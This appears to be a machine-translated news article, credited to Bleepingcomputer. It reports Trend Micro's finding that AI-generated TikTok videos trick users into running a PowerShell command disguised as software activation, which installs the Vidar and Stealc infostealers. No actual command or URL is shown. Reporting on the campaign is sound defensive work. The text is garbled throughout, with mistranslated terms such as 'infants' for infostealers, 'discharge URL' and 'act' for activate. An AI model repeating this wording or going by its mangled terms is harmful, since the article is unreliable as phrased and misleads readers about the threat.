- Trend Micro saw a new malware campaign on Tiktok
- Videos show how to activate “premium” functions in different software
- The clips were generated by AI and cheated the victims to download infants
Computer pirates are publishing videos generated by AI on Tiktok to deceive users to download infteilated malware, cybersecurity researchers Trend Micro have warned.
The premise is simple: the attackers use AI to generate numerous videos that demonstrate how to “act” easily Windows and Microsoft Office, or enable “premium features” in applications such as Spotify or Capcut.
Then they share these videos on Tiktok, whose algorithm makes it more likely to change the viral video, which makes the success of the attack more likely.
A new turn in old tricks
In the clip, a person who mentions the running program in Windows is shown and then runs a Powershell command.
While in the video, the command results in the activation of special features, in reality, users who execute the command would download a malicious script that, in turn, implements Vidar and Stealc Infotealers.
These infants of infants can take screenshots, steal login credentials, get credit card data, cookie exfiltrate, cryptocurrency wallet information, 2fA codes and more.
“This attack uses videos (possibly generated by AI) to instruct users to execute Powershell commands, which disguise software activation steps. The algorithmic scope of Tiktok increases the probability of a generalized exhibition, with a video that reaches more than half a million views,” Trend Micro said.
“The videos are very similar, with only minor differences in the angles of the camera and the discharge URL used by Powershell to obtain the payload,” the researchers added.
“These suggest that videos were probably created through automation. The instructional voice also seems generated by AI, reinforcing the probability that the tools of AI are used to produce these videos.”
One of the videos has approximately 500,000 visits, more than 20,000 likes and more than 100 comments, which makes it quite successful.
The videos were also being used to deliver malware in the past, but this new campaign is a significant deviation of the previous methods.
The difference is that before, the link to the malware was shared in the description of the video, or comment, where it could still be collected by Security Solutions. When delivering the bait in a video format, the attackers successfully avoid almost all security measures.
Through Bleepingcomputer
